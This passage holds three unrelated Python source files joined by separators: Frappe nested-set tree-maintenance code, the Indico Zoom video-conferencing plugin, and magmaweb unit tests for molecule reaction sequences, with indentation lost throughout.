frappe.db.sql("update `tab{0}` set lft=%s, rgt=%s, modified=%s where name=%s".format(doctype),
(right,right+1, n, name))
return right
def update_move_node(doc, parent_field):
n = now()
parent = doc.get(parent_field)
if parent:
new_parent = frappe.db.sql("""select lft, rgt from `tab{0}`
where name = %s""".format(doc.doctype), parent, as_dict=1)[0]
validate_loop(doc.doctype, doc.name, new_parent.lft, new_parent.rgt)
# move to dark side
frappe.db.sql("""update `tab{0}` set lft = -lft, rgt = -rgt, modified=%s
where lft >= %s and rgt <= %s""".format(doc.doctype), (n, doc.lft, doc.rgt))
# shift left
diff = doc.rgt - doc.lft + 1
frappe.db.sql("""update `tab{0}` set lft = lft -%s, rgt = rgt - %s, modified=%s
where lft > %s""".format(doc.doctype), (diff, diff, n, doc.rgt))
# shift left rgts of ancestors whose only rgts must shift
frappe.db.sql("""update `tab{0}` set rgt = rgt - %s, modified=%s
where lft < %s and rgt > %s""".format(doc.doctype), (diff, n, doc.lft, doc.rgt))
if parent:
new_parent = frappe.db.sql("""select lft, rgt from `tab%s`
where name = %s""" % (doc.doctype, '%s'), parent, as_dict=1)[0]
# set parent lft, rgt
frappe.db.sql("""update `tab{0}` set rgt = rgt + %s, modified=%s
where name = %s""".format(doc.doctype), (diff, n, parent))
# shift right at new parent
frappe.db.sql("""update `tab{0}` set lft = lft + %s, rgt = rgt + %s, modified=%s
where lft > %s""".format(doc.doctype), (diff, diff, n, new_parent.rgt))
# shift right rgts of ancestors whose only rgts must shift
frappe.db.sql("""update `tab{0}` set rgt = rgt + %s, modified=%s
where lft < %s and rgt > %s""".format(doc.doctype),
(diff, n, new_parent.lft, new_parent.rgt))
new_diff = new_parent.rgt - doc.lft
else:
# new root
max_rgt = frappe.db.sql("""select max(rgt) from `tab{0}`""".format(doc.doctype))[0][0]
new_diff = max_rgt + 1 - doc.lft
# bring back from dark side
frappe.db.sql("""update `tab{0}` set lft = -lft + %s, rgt = -rgt + %s, modified=%s
where lft < 0""".format(doc.doctype), (new_diff, new_diff, n))
def rebuild_tree(doctype, parent_field):
"""
call rebuild_node for all root nodes
"""
# get all roots
frappe.db.auto_commit_on_many_writes = 1
right = 1
result = frappe.db.sql("SELECT name FROM `tab%s` WHERE `%s`='' or `%s` IS NULL ORDER BY name ASC" % (doctype, parent_field, parent_field))
for r in result:
right = rebuild_node(doctype, r[0], right, parent_field)
frappe.db.auto_commit_on_many_writes = 0
def rebuild_node(doctype, parent, left, parent_field):
"""
reset lft, rgt and recursive call for all children
"""
from frappe.utils import now
n = now()
# the right value of this node is the left value + 1
right = left+1
# get all children of this node
result = frappe.db.sql("SELECT name FROM `tab{0}` WHERE `{1}`=%s"
.format(doctype, parent_field), (parent))
for r in result:
right = rebuild_node(doctype, r[0], right, parent_field)
# we've got the left value, and now that we've processed
# the children of this node we also know the right value
frappe.db.sql("""UPDATE `tab{0}` SET lft=%s, rgt=%s, modified=%s
WHERE name=%s""".format(doctype), (left,right,n,parent))
#return the right value of this node + 1
return right+1
def validate_loop(doctype, name, lft, rgt):
"""check if item not an ancestor (loop)"""
if name in frappe.db.sql_list("""select name from `tab{0}` where lft <= %s and rgt >= %s"""
.format(doctype), (lft, rgt)):
frappe.throw(_("Item cannot be added to its own descendents"), NestedSetRecursionError)
class NestedSet(Document):
def __setup__(self):
if self.meta.get("nsm_parent_field"):
self.nsm_parent_field = self.meta.nsm_parent_field
def on_update(self):
update_nsm(self)
self.validate_ledger()
def on_trash(self, allow_root_deletion=False):
if not getattr(self, 'nsm_parent_field', None):
self.nsm_parent_field = frappe.scrub(self.doctype) + "_parent"
parent = self.get(self.nsm_parent_field)
if not parent and not allow_root_deletion:
frappe.throw(_("Root {0} cannot be deleted").format(_(self.doctype)))
# cannot delete non-empty group
self.validate_if_child_exists()
self.set(self.nsm_parent_field, "")
try:
update_nsm(self)
except frappe.DoesNotExistError:
if self.flags.on_rollback:
pass
frappe.message_log.pop()
else:
raise
def validate_if_child_exists(self):
has_children = frappe.db.sql("""select count(name) from `tab{doctype}`
where `{nsm_parent_field}`=%s""".format(doctype=self.doctype, nsm_parent_field=self.nsm_parent_field),
(self.name,))[0][0]
if has_children:
frappe.throw(_("Cannot delete {0} as it has child nodes").format(self.name), NestedSetChildExistsError)
def before_rename(self, olddn, newdn, merge=False, group_fname="is_group"):
if merge and hasattr(self, group_fname):
is_group = frappe.db.get_value(self.doctype, newdn, group_fname)
if self.get(group_fname) != is_group:
frappe.throw(_("Merging is only possible between Group-to-Group or Leaf Node-to-Leaf Node"), NestedSetInvalidMergeError)
def after_rename(self, olddn, newdn, merge=False):
if not self.nsm_parent_field:
parent_field = "parent_" + self.doctype.replace(" ", "_").lower()
else:
parent_field = self.nsm_parent_field
# set old_parent for children
frappe.db.sql("update `tab{0}` set old_parent=%s where {1}=%s"
.format(self.doctype, parent_field), (newdn, newdn))
if merge:
rebuild_tree(self.doctype, parent_field)
def validate_one_root(self):
if not self.get(self.nsm_parent_field):
if self.get_root_node_count() > 1:
frappe.throw(_("""Multiple root nodes not allowed."""), NestedSetMultipleRootsError)
def get_root_node_count(self):
return frappe.db.count(self.doctype, {
self.nsm_parent_field: ''
})
def validate_ledger(self, group_identifier="is_group"):
if hasattr(self, group_identifier) and not bool(self.get(group_identifier)):
if frappe.db.sql("""select name from `tab{0}` where {1}=%s and docstatus!=2"""
.format(self.doctype, self.nsm_parent_field), (self.name)):
frappe.throw(_("{0} {1} cannot be a leaf node as it has children").format(_(self.doctype), self.name))
def get_ancestors(self):
return get_ancestors_of(self.doctype, self.name)
def get_root_of(doctype):
"""Get root element of a DocType with a tree structure"""
result = frappe.db.sql("""select t1.name from `tab{0}` t1 where
(select count(*) from `tab{1}` t2 where
t2.lft < t1.lft and t2.rgt > t1.rgt) = 0
and t1.rgt > t1.lft""".format(doctype, doctype))
return result[0][0] if result else None
def get_ancestors_of(doctype, name, order_by="lft desc", limit=None):
"""Get ancestor elements of a DocType with a tree structure"""
lft, rgt = frappe.db.get_value(doctype, name, ["lft", "rgt"])
result = [d["name"] for d in frappe.db.get_all(doctype, {"lft": ["<", lft], "rgt": [">", rgt]},
"name", order_by=order_by, limit_page_length=limit)]
return result or []
def get_descendants_of(doctype, name, order_by="lft desc", limit=None,
ignore_permissions=False):
'''Return descendants of the current record'''
lft, rgt = frappe.db.get_value(doctype, name, ['lft', 'rgt'])
result = [d["name"] for d in frappe.db.get_list(doctype, {"lft": [">", lft], "rgt": ["<", rgt]},
"name", order_by=order_by, limit_page_length=limit, ignore_permissions=ignore_permissions)]
return result or []
| |
# This file is part of the Indico plugins.
# Copyright (C) 2020 - 2021 CERN and ENEA
#
# The Indico plugins are free software; you can redistribute
# them and/or modify them under the terms of the MIT License;
# see the LICENSE file for more details.
from flask import flash, has_request_context, request, session
from markupsafe import escape
from requests.exceptions import HTTPError
from sqlalchemy.orm.attributes import flag_modified
from wtforms.fields import TextAreaField
from wtforms.fields.core import BooleanField
from wtforms.fields.html5 import URLField
from wtforms.fields.simple import StringField
from wtforms.validators import URL, DataRequired, Optional, ValidationError
from indico.core import signals
from indico.core.auth import multipass
from indico.core.errors import UserValueError
from indico.core.plugins import IndicoPlugin, render_plugin_template, url_for_plugin
from indico.modules.events.views import WPSimpleEventDisplay
from indico.modules.vc import VCPluginMixin, VCPluginSettingsFormBase
from indico.modules.vc.exceptions import VCRoomError, VCRoomNotFoundError
from indico.modules.vc.models.vc_rooms import VCRoom, VCRoomStatus
from indico.modules.vc.views import WPVCEventPage, WPVCManageEvent
from indico.util.user import principal_from_identifier
from indico.web.forms.fields import IndicoEnumSelectField, IndicoPasswordField, TextListField
from indico.web.forms.validators import HiddenUnless
from indico.web.forms.widgets import CKEditorWidget, SwitchWidget
from indico_vc_zoom import _
from indico_vc_zoom.api import ZoomIndicoClient
from indico_vc_zoom.blueprint import blueprint
from indico_vc_zoom.cli import cli
from indico_vc_zoom.forms import VCRoomAttachForm, VCRoomForm
from indico_vc_zoom.notifications import notify_host_start_url
from indico_vc_zoom.util import (UserLookupMode, ZoomMeetingType, fetch_zoom_meeting, find_enterprise_email,
gen_random_password, get_alt_host_emails, get_schedule_args, get_url_data_args,
process_alternative_hosts, update_zoom_meeting)
class PluginSettingsForm(VCPluginSettingsFormBase):
_fieldsets = [
(_('API Credentials'), ['api_key', 'api_secret', 'webhook_token']),
(_('Zoom Account'), ['user_lookup_mode', 'email_domains', 'authenticators', 'enterprise_domain',
'allow_webinars', 'phone_link']),
(_('Room Settings'), ['mute_audio', 'mute_host_video', 'mute_participant_video', 'join_before_host',
'waiting_room']),
(_('Notifications'), ['creation_email_footer', 'send_host_url', 'notification_emails']),
(_('Access'), ['managers', 'acl'])
]
api_key = StringField(_('API Key'), [DataRequired()])
api_secret = IndicoPasswordField(_('API Secret'), [DataRequired()], toggle=True)
webhook_token = IndicoPasswordField(_('Webhook Token'), toggle=True,
description=_("Specify Zoom's webhook token if you want live updates"))
user_lookup_mode = IndicoEnumSelectField(_('User lookup mode'), [DataRequired()], enum=UserLookupMode,
description=_('Specify how Indico should look up the zoom user that '
'corresponds to an Indico user.'))
email_domains = TextListField(_('E-mail domains'),
[HiddenUnless('user_lookup_mode', UserLookupMode.email_domains), DataRequired()],
description=_('List of e-mail domains which can use the Zoom API. Indico attempts '
'to find Zoom accounts using all email addresses of a user which use '
'those domains.'))
authenticators = TextListField(_('Indico identity providers'),
[HiddenUnless('user_lookup_mode', UserLookupMode.authenticators), DataRequired()],
description=_('Identity providers from which to get usernames. '
'Indico queries those providers using the email addresses of the user '
'and attempts to find Zoom accounts having an email address with the '
'format username@enterprise-domain.'))
enterprise_domain = StringField(_('Enterprise domain'),
[HiddenUnless('user_lookup_mode', UserLookupMode.authenticators), DataRequired()],
description=_('The domain name used together with the usernames from the Indico '
'identity provider'))
allow_webinars = BooleanField(_('Allow Webinars (Experimental)'),
widget=SwitchWidget(),
description=_('Allow webinars to be created through Indico. Use at your own risk.'))
mute_audio = BooleanField(_('Mute audio'),
widget=SwitchWidget(),
description=_('Participants will join the VC room muted by default '))
mute_host_video = BooleanField(_('Mute video (host)'),
widget=SwitchWidget(),
description=_('The host will join the VC room with video disabled'))
mute_participant_video = BooleanField(_('Mute video (participants)'),
widget=SwitchWidget(),
description=_('Participants will join the VC room with video disabled'))
join_before_host = BooleanField(_('Join Before Host'),
widget=SwitchWidget(),
description=_('Allow participants to join the meeting before the host starts the '
'meeting. Only used for scheduled or recurring meetings.'))
waiting_room = BooleanField(_('Waiting room'),
widget=SwitchWidget(),
description=_('Participants may be kept in a waiting room by the host'))
creation_email_footer = TextAreaField(_('Creation email footer'), widget=CKEditorWidget(),
description=_('Footer to append to emails sent upon creation of a VC room'))
send_host_url = BooleanField(_('Send host URL'),
widget=SwitchWidget(),
description=_('Whether to send an e-mail with the Host URL to the meeting host upon '
'creation of a meeting'))
phone_link = URLField(_('Join via phone'), [Optional(), URL()],
description=_('Link to the list of VidyoVoice phone numbers'))
def validate_authenticators(self, field):
invalid = set(field.data) - set(multipass.identity_providers)
if invalid:
raise ValidationError(_('Invalid identity providers: {}').format(escape(', '.join(invalid))))
class ZoomPlugin(VCPluginMixin, IndicoPlugin):
"""Zoom
Zoom Plugin for Indico."""
configurable = True
settings_form = PluginSettingsForm
vc_room_form = VCRoomForm
vc_room_attach_form = VCRoomAttachForm
friendly_name = 'Zoom'
default_settings = dict(VCPluginMixin.default_settings, **{
'api_key': '',
'api_secret': '',
'webhook_token': '',
'user_lookup_mode': UserLookupMode.email_domains,
'email_domains': [],
'authenticators': [],
'enterprise_domain': '',
'allow_webinars': False,
'mute_host_video': True,
'mute_audio': True,
'mute_participant_video': True,
'join_before_host': True,
'waiting_room': False,
'creation_email_footer': None,
'send_host_url': False,
'phone_link': '',
})
def init(self):
super().init()
self.connect(signals.plugin.cli, self._extend_indico_cli)
self.connect(signals.event.times_changed, self._times_changed)
self.connect(signals.event.metadata_postprocess, self._event_metadata_postprocess)
self.template_hook('event-vc-room-list-item-labels', self._render_vc_room_labels)
self.inject_bundle('main.js', WPSimpleEventDisplay)
self.inject_bundle('main.js', WPVCEventPage)
self.inject_bundle('main.js', WPVCManageEvent)
@property
def logo_url(self):
return url_for_plugin(self.name + '.static', filename='images/zoom_logo.png')
@property
def icon_url(self):
return url_for_plugin(self.name + '.static', filename='images/zoom_logo.png')
def create_form(self, event, existing_vc_room=None, existing_event_vc_room=None):
"""Override the default room form creation mechanism."""
if existing_vc_room and request.method != 'POST':
try:
self.refresh_room(existing_vc_room, event)
except VCRoomNotFoundError as exc:
raise UserValueError(str(exc))
except VCRoomError:
# maybe a temporary issue - we just keep going and fail when saving in
# case it's something more persistent
pass
form = super().create_form(
event,
existing_vc_room=existing_vc_room,
existing_event_vc_room=existing_event_vc_room
)
if existing_vc_room:
form.host_choice.render_kw = {'disabled': True}
form.host_user.render_kw = {'disabled': True}
if self.settings.get('allow_webinars'):
# if we're editing a VC room, we will not allow the meeting type to be changed
form.meeting_type.render_kw = {'disabled': True}
if form.data['meeting_type'] == 'webinar':
# webinar hosts cannot be changed through the API
form.host_choice.render_kw = {'disabled': True}
form.host_user.render_kw = {'disabled': True}
elif not form.is_submitted():
form.password.data = gen_random_password()
return form
def get_extra_delete_msg(self, vc_room, event_vc_room):
host = principal_from_identifier(vc_room.data['host'])
if host == session.user or len(vc_room.events) <= 1:
return ''
return render_plugin_template('vc_zoom:extra_delete_msg.html', host=host.full_name)
def _extend_indico_cli(self, sender, **kwargs):
return cli
def update_data_association(self, event, vc_room, room_assoc, data):
# XXX: This feels slightly hacky. Maybe we should change the API on the core?
association_is_new = room_assoc.vc_room is None
old_link = room_assoc.link_object
# in a new room, `meeting_type` comes in `data`, otherwise it's already in the VCRoom
is_webinar = data.get('meeting_type', vc_room.data and vc_room.data.get('meeting_type')) == 'webinar'
super().update_data_association(event, vc_room, room_assoc, data)
if vc_room.data:
try:
# this is not a new room
if association_is_new:
# this means we are updating an existing meeting with a new vc_room-event association
update_zoom_meeting(vc_room.data['zoom_id'], {
'start_time': None,
'duration': None,
'type': (
ZoomMeetingType.recurring_webinar_no_time
if is_webinar
else ZoomMeetingType.recurring_meeting_no_time
)
})
elif room_assoc.link_object != old_link:
# the booking should now be linked to something else
new_schedule_args = (get_schedule_args(room_assoc.link_object)
if room_assoc.link_object.start_dt
else {})
meeting = fetch_zoom_meeting(vc_room)
current_schedule_args = {k: meeting[k] for k in {'start_time', 'duration'} if k in meeting}
# check whether the start time / duration of the scheduled meeting differs
if new_schedule_args != current_schedule_args:
if new_schedule_args:
update_zoom_meeting(vc_room.data['zoom_id'], new_schedule_args)
else:
update_zoom_meeting(vc_room.data['zoom_id'], {
'start_time': None,
'duration': None,
'type': (
ZoomMeetingType.recurring_webinar_no_time
if is_webinar
else ZoomMeetingType.recurring_meeting_no_time
)
})
except VCRoomNotFoundError as exc:
raise UserValueError(str(exc)) from exc
room_assoc.data['password_visibility'] = data.pop('password_visibility')
flag_modified(room_assoc, 'data')
def update_data_vc_room(self, vc_room, data, is_new=False):
super().update_data_vc_room(vc_room, data)
fields = {'description', 'password'}
# we may end up not getting a meeting_type from the form
# (i.e. webinars are disabled)
data.setdefault('meeting_type', 'regular' if is_new else vc_room.data['meeting_type'])
if data['meeting_type'] == 'webinar':
fields |= {'mute_host_video'}
if is_new:
fields |= {'host', 'meeting_type'}
else:
fields |= {
'meeting_type', 'host', 'mute_audio', 'mute_participant_video', 'mute_host_video', 'join_before_host',
'waiting_room'
}
for key in fields:
if key in data:
vc_room.data[key] = data.pop(key)
flag_modified(vc_room, 'data')
def create_room(self, vc_room, event):
"""Create a new Zoom room for an event, given a VC room.
In order to create the Zoom room, the function will try to get
a valid e-mail address for the user in question, which can be
use with the Zoom API.
:param vc_room: the VC room from which to create the Zoom room
:param event: the event to the Zoom room will be attached
"""
client = ZoomIndicoClient()
host = principal_from_identifier(vc_room.data['host'])
host_email = find_enterprise_email(host)
# get the object that this booking is linked to
vc_room_assoc = vc_room.events[0]
link_obj = vc_room_assoc.link_object
is_webinar = vc_room.data.setdefault('meeting_type', 'regular') == 'webinar'
scheduling_args = get_schedule_args(link_obj) if link_obj.start_dt else {}
try:
settings = {
'host_video': not vc_room.data['mute_host_video'],
}
kwargs = {}
if is_webinar:
kwargs['type'] = (ZoomMeetingType.webinar
if scheduling_args
else ZoomMeetingType.recurring_webinar_no_time)
settings['alternative_hosts'] = host_email
else:
kwargs = {
'type': (
ZoomMeetingType.scheduled_meeting
if scheduling_args
else ZoomMeetingType.recurring_meeting_no_time
),
'schedule_for': host_email
}
settings.update({
'mute_upon_entry': vc_room.data['mute_audio'],
'participant_video': not vc_room.data['mute_participant_video'],
'waiting_room': vc_room.data['waiting_room'],
'join_before_host': self.settings.get('join_before_host'),
})
kwargs.update({
'topic': vc_room.name,
'agenda': vc_room.data['description'],
'password': vc_room.data['password'],
'timezone': event.timezone,
'settings': settings
})
kwargs.update(scheduling_args)
if is_webinar:
meeting_obj = client.create_webinar(host_email, **kwargs)
else:
meeting_obj = client.create_meeting(host_email, **kwargs)
except HTTPError as e:
self.logger.exception('Error creating Zoom Room: %s', e.response.content)
raise VCRoomError(_('Could not create the room in Zoom. Please contact support if the error persists'))
vc_room.data.update({
'zoom_id': str(meeting_obj['id']),
'start_url': meeting_obj['start_url'],
'host': host.identifier,
'alternative_hosts': process_alternative_hosts(meeting_obj['settings'].get('alternative_hosts', ''))
})
vc_room.data.update(get_url_data_args(meeting_obj['join_url']))
flag_modified(vc_room, 'data')
# e-mail Host URL to meeting host
if self.settings.get('send_host_url'):
notify_host_start_url(vc_room)
def update_room(self, vc_room, event):
client = ZoomIndicoClient()
is_webinar = vc_room.data['meeting_type'] == 'webinar'
zoom_meeting = fetch_zoom_meeting(vc_room, client=client, is_webinar=is_webinar)
changes = {}
if vc_room.name != zoom_meeting['topic']:
changes['topic'] = vc_room.name
if vc_room.data['description'] != zoom_meeting.get('agenda', ''):
changes['agenda'] = vc_room.data['description']
if vc_room.data['password'] != zoom_meeting['password']:
changes['password'] = vc_room.data['password']
zoom_meeting_settings = zoom_meeting['settings']
if vc_room.data['mute_host_video'] == zoom_meeting_settings['host_video']:
changes.setdefault('settings', {})['host_video'] = not vc_room.data['mute_host_video']
alternative_hosts = process_alternative_hosts(zoom_meeting_settings.get('alternative_hosts', ''))
if vc_room.data['alternative_hosts'] != alternative_hosts:
new_alt_host_emails = get_alt_host_emails(vc_room.data['alternative_hosts'])
changes.setdefault('settings', {})['alternative_hosts'] = ','.join(new_alt_host_emails)
if not is_webinar:
if vc_room.data['mute_audio'] != zoom_meeting_settings['mute_upon_entry']:
changes.setdefault('settings', {})['mute_upon_entry'] = vc_room.data['mute_audio']
if vc_room.data['mute_participant_video'] == zoom_meeting_settings['participant_video']:
changes.setdefault('settings', {})['participant_video'] = not vc_room.data['mute_participant_video']
if vc_room.data['waiting_room'] != zoom_meeting_settings['waiting_room']:
changes.setdefault('settings', {})['waiting_room'] = vc_room.data['waiting_room']
if changes:
update_zoom_meeting(vc_room.data['zoom_id'], changes, is_webinar=is_webinar)
# always refresh meeting URL (it may have changed if password changed)
zoom_meeting = fetch_zoom_meeting(vc_room, client=client, is_webinar=is_webinar)
vc_room.data.update(get_url_data_args(zoom_meeting['join_url']))
def refresh_room(self, vc_room, event):
is_webinar = vc_room.data['meeting_type'] == 'webinar'
zoom_meeting = fetch_zoom_meeting(vc_room, is_webinar=is_webinar)
vc_room.name = zoom_meeting['topic']
vc_room.data.update({
'description': zoom_meeting.get('agenda', ''),
'zoom_id': zoom_meeting['id'],
'password': zoom_meeting['password'],
'mute_host_video': zoom_meeting['settings']['host_video'],
# these options will be empty for webinars
'mute_audio': zoom_meeting['settings'].get('mute_upon_entry'),
'mute_participant_video': not zoom_meeting['settings'].get('participant_video'),
'waiting_room': zoom_meeting['settings'].get('waiting_room'),
'alternative_hosts': process_alternative_hosts(zoom_meeting['settings'].get('alternative_hosts'))
})
vc_room.data.update(get_url_data_args(zoom_meeting['join_url']))
flag_modified(vc_room, 'data')
def delete_room(self, vc_room, event):
client = ZoomIndicoClient()
zoom_id = vc_room.data['zoom_id']
is_webinar = vc_room.data['meeting_type'] == 'webinar'
try:
if is_webinar:
client.delete_webinar(zoom_id)
else:
client.delete_meeting(zoom_id)
except HTTPError as e:
# if there's a 404, there is no problem, since the room is supposed to be gone anyway
if e.response.status_code == 404:
if has_request_context():
flash(_("Room didn't exist in Zoom anymore"), 'warning')
elif e.response.status_code == 400:
# some sort of operational error on Zoom's side, deserves a specific error message
raise VCRoomError(_('Zoom Error: "{}"').format(e.response.json()['message']))
else:
self.logger.error("Can't delete room")
raise VCRoomError(_('Problem deleting room'))
def clone_room(self, old_event_vc_room, link_object):
vc_room = old_event_vc_room.vc_room
is_webinar = vc_room.data.get('meeting_type', 'regular') == 'webinar'
has_only_one_association = len({assoc.event_id for assoc in vc_room.events}) == 1
if has_only_one_association:
try:
update_zoom_meeting(vc_room.data['zoom_id'], {
'start_time': None,
'duration': None,
'type': (
ZoomMeetingType.recurring_webinar_no_time
if is_webinar
else ZoomMeetingType.recurring_meeting_no_time
)
})
except VCRoomNotFoundError:
# this check is needed in order to avoid multiple flashes
if vc_room.status != VCRoomStatus.deleted:
# mark room as deleted
vc_room.status = VCRoomStatus.deleted
flash(
_('The room "{}" no longer exists in Zoom and was removed from the event').format(vc_room.name),
'warning'
)
# no need to create an association to a room marked as deleted
return None
# return the new association
return super().clone_room(old_event_vc_room, link_object)
def get_blueprints(self):
return blueprint
def get_vc_room_form_defaults(self, event):
defaults = super().get_vc_room_form_defaults(event)
defaults.update({
'meeting_type': 'regular' if self.settings.get('allow_webinars') else None,
'mute_audio': self.settings.get('mute_audio'),
'mute_host_video': self.settings.get('mute_host_video'),
'mute_participant_video': self.settings.get('mute_participant_video'),
'waiting_room': self.settings.get('waiting_room'),
'host_choice': 'myself',
'host_user': None,
'password_visibility': 'logged_in'
})
return defaults
def get_vc_room_attach_form_defaults(self, event):
defaults = super().get_vc_room_attach_form_defaults(event)
defaults['password_visibility'] = 'logged_in'
return defaults
def can_manage_vc_room(self, user, room):
return (
user == principal_from_identifier(room.data['host']) or
super().can_manage_vc_room(user, room)
)
def _merge_users(self, target, source, **kwargs):
super()._merge_users(target, source, **kwargs)
for room in VCRoom.query.filter(
VCRoom.type == self.service_name, VCRoom.data.contains({'host': source.identifier})
):
room.data['host'] = target.identifier
flag_modified(room, 'data')
for room in VCRoom.query.filter(
VCRoom.type == self.service_name, VCRoom.data.contains({'alternative_hosts': [source.identifier]})
):
room.data['alternative_hosts'].remove(source.identifier)
room.data['alternative_hosts'].append(target.identifier)
flag_modified(room, 'data')
def get_notification_cc_list(self, action, vc_room, event):
return {principal_from_identifier(vc_room.data['host']).email}
def _render_vc_room_labels(self, event, vc_room, **kwargs):
if vc_room.plugin != self:
return
return render_plugin_template('room_labels.html', vc_room=vc_room)
def _times_changed(self, sender, obj, **kwargs):
from indico.modules.events.contributions.models.contributions import Contribution
from indico.modules.events.models.events import Event
from indico.modules.events.sessions.models.blocks import SessionBlock
if not hasattr(obj, 'vc_room_associations'):
return
if any(assoc.vc_room.type == 'zoom' and len(assoc.vc_room.events) == 1 for assoc in obj.vc_room_associations):
if sender == Event:
message = _('There are one or more scheduled Zoom meetings associated with this event which were not '
'automatically updated.')
elif sender == Contribution:
message = _('There are one or more scheduled Zoom meetings associated with the contribution "{}" which '
' were not automatically updated.').format(obj.title)
elif sender == SessionBlock:
message = _('There are one or more scheduled Zoom meetings associated with this session block which '
'were not automatically updated.')
else:
return
flash(message, 'warning')
def _event_metadata_postprocess(self, sender, event, data, user=None, **kwargs):
urls = []
if 'description' in kwargs.get('html_fields', ()):
linebreak = '<br>\n'
format_link = lambda name, url: f'<a href="{url}">{escape(name)}: {url}</a>'
else:
linebreak = '\n'
format_link = lambda name, url: f'{name}: {url}'
for assoc in event.vc_room_associations:
if not assoc.show or assoc.vc_room.type != 'zoom':
continue
visibility = assoc.data.get('password_visibility', 'logged_in')
if (
visibility == 'everyone' or
(visibility == 'logged_in' and user is not None) or
(visibility == 'registered' and user is not None and event.is_user_registered(user)) or
event.can_manage(user)
):
urls.append(format_link(assoc.vc_room.name, assoc.vc_room.data['url']))
elif visibility == 'no_one':
# XXX: Not sure if showing this is useful, but on the event page we show the join link
# with no passcode as well, so let's the logic identical here.
urls.append(format_link(assoc.vc_room.name, assoc.vc_room.data['public_url']))
if urls:
return {'description': (data['description'] + (linebreak * 2) + linebreak.join(urls)).strip()}
| |
import unittest
import json
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from magmaweb.models import ReactionSequence, Molecule, Reaction
from magmaweb.models import fill_molecules_reactions
class TestReactionSequence(unittest.TestCase):
reactions = {
'products': [{
'esterase': {'nr': 123, 'nrp': 45}
}],
'reactants': [{
'theogallin': {'nr': 678, 'nrp': 90}
}]
}
reactions_json = '{"reactants": [{"theogallin": {"nr": 678, "nrp": 90}}]' +\
', "products": [{"esterase": {"nr": 123, "nrp": 45}}]}'
def setUp(self):
self.rs = ReactionSequence()
def test_set(self):
r = json.loads(self.rs.process_bind_param(self.reactions, 'sqlite'))
self.assertEqual(r, json.loads(self.reactions_json))
def test_set_none(self):
reactions = None
r = self.rs.process_bind_param(reactions, 'sqlite')
self.assertIsNone(r)
def test_get(self):
r = self.rs.process_result_value(self.reactions_json, 'sqlite')
self.assertEqual(r, self.reactions)
def test_get_empty(self):
reactions = u''
r = self.rs.process_result_value(reactions, 'sqlite')
self.assertEqual(r, {})
def test_get_none(self):
reactions = None
r = self.rs.process_result_value(reactions, 'sqlite')
self.assertEqual(r, None)
def test_get_badjson2empty(self):
reactions = u'PARENT'
r = self.rs.process_result_value(reactions, 'sqlite')
self.assertEqual(r, {})
class TestFillMoleculeReactions(unittest.TestCase):
def setUp(self):
# default use a in memory db
url = 'sqlite://'
engine = create_engine(url)
self.Session = sessionmaker(bind=engine)
from magmaweb.models import Base
Base.metadata.create_all(engine) # @UndefinedVariable
def getReactionSequence(self, molid):
return self.Session().query(Molecule).get(molid).reactionsequence
def test_noreactions(self):
session = self.Session()
session.add(Molecule(
molid=1, nhits=1
))
session.flush()
fill_molecules_reactions(session)
self.assertDictEqual(self.getReactionSequence(1), {})
def test_singlereaction(self):
"""
1 -1> 2
"""
session = self.Session()
session.add(Molecule(molid=1, nhits=1))
session.add(Molecule(molid=2, nhits=1))
session.add(Reaction(reactid=1, name=u'esterase',
reactant=1, product=2))
session.flush()
fill_molecules_reactions(session)
expected1 = {
u'products': {
u'esterase': {
u'nr': 1,
u'nrp': 1
}
}
}
self.assertDictEqual(self.getReactionSequence(1), expected1)
expected2 = {
u'reactants': {
u'esterase': {
u'nr': 1,
u'nrp': 1
}
}
}
self.assertDictEqual(self.getReactionSequence(2), expected2)
def test_reactionson2molecules(self):
"""
1 -1> 2 -2> 1
"""
session = self.Session()
session.add(Molecule(molid=1, nhits=1))
session.add(Molecule(molid=2, nhits=1))
session.add(Reaction(reactid=1, name=u'esterase',
reactant=1, product=2))
session.add(Reaction(reactid=2, name=u'theogallin',
reactant=2, product=1))
session.flush()
fill_molecules_reactions(session)
expected1 = {
u'products': {
u'esterase': {
u'nr': 1,
u'nrp': 1
}
},
u'reactants': {
u'theogallin': {
u'nr': 1,
u'nrp': 1
}
}
}
self.assertDictEqual(self.getReactionSequence(1), expected1)
expected2 = {
u'products': {
u'theogallin': {
u'nr': 1,
u'nrp': 1
}
},
u'reactants': {
u'esterase': {
u'nr': 1,
u'nrp': 1
}
}
}
self.assertDictEqual(self.getReactionSequence(2), expected2)
def test_reactionson4molecules(self):
"""
1 -1> 2 -3> 4
1 -2> 3 -4> 4
"""
session = self.Session()
session.add(Molecule(molid=1, nhits=1))
session.add(Molecule(molid=2, nhits=1))
session.add(Molecule(molid=3, nhits=0))
session.add(Molecule(molid=4, nhits=1))
session.add(Reaction(reactid=1, name=u'esterase',
reactant=1, product=2))
session.add(Reaction(reactid=2, name=u'theogallin',
reactant=1, product=3))
session.add(Reaction(reactid=3, name=u'dehydrox',
reactant=2, product=4))
session.add(Reaction(reactid=4, name=u'reduc',
reactant=3, product=4))
session.flush()
fill_molecules_reactions(session)
expected1 = {
u'products': {u'esterase': {u'nr': 1, u'nrp': 1},
u'theogallin': {u'nr': 1}}
}
self.assertDictEqual(self.getReactionSequence(1), expected1)
expected2 = {
u'reactants': {u'esterase': {u'nr': 1, u'nrp': 1}},
u'products': {u'dehydrox': {u'nr': 1, u'nrp': 1}}
}
self.assertDictEqual(self.getReactionSequence(2), expected2)
expected3 = {
u'reactants': {u'theogallin': {u'nr': 1, u'nrp': 1}},
u'products': {u'reduc': {u'nr': 1, u'nrp': 1}}
}
self.assertDictEqual(self.getReactionSequence(3), expected3)
expected4 = {
u'reactants': {u'dehydrox': {u'nr': 1, u'nrp': 1},
u'reduc': {u'nr': 1}}
}
self.assertDictEqual(self.getReactionSequence(4), expected4)
def test_reactionson1reaction2reactants(self):
"""
1 -1> 2
1 -1> 3
"""
session = self.Session()
session.add(Molecule(molid=1, nhits=1))
session.add(Molecule(molid=2, nhits=1))
session.add(Molecule(molid=3, nhits=1))
session.add(Reaction(reactid=1, name=u'esterase',
reactant=1, product=2))
session.add(Reaction(reactid=2, name=u'esterase',
reactant=1, product=3))
session.flush()
fill_molecules_reactions(session)
expected1 = {
u'products': {u'esterase': {u'nr': 2, u'nrp': 2}},
}
self.assertDictEqual(self.getReactionSequence(1), expected1)
expected2 = {
u'reactants': {u'esterase': {u'nr': 1, u'nrp': 1}},
}
self.assertDictEqual(self.getReactionSequence(2), expected2)
expected3 = {
u'reactants': {u'esterase': {u'nr': 1, u'nrp': 1}},
}
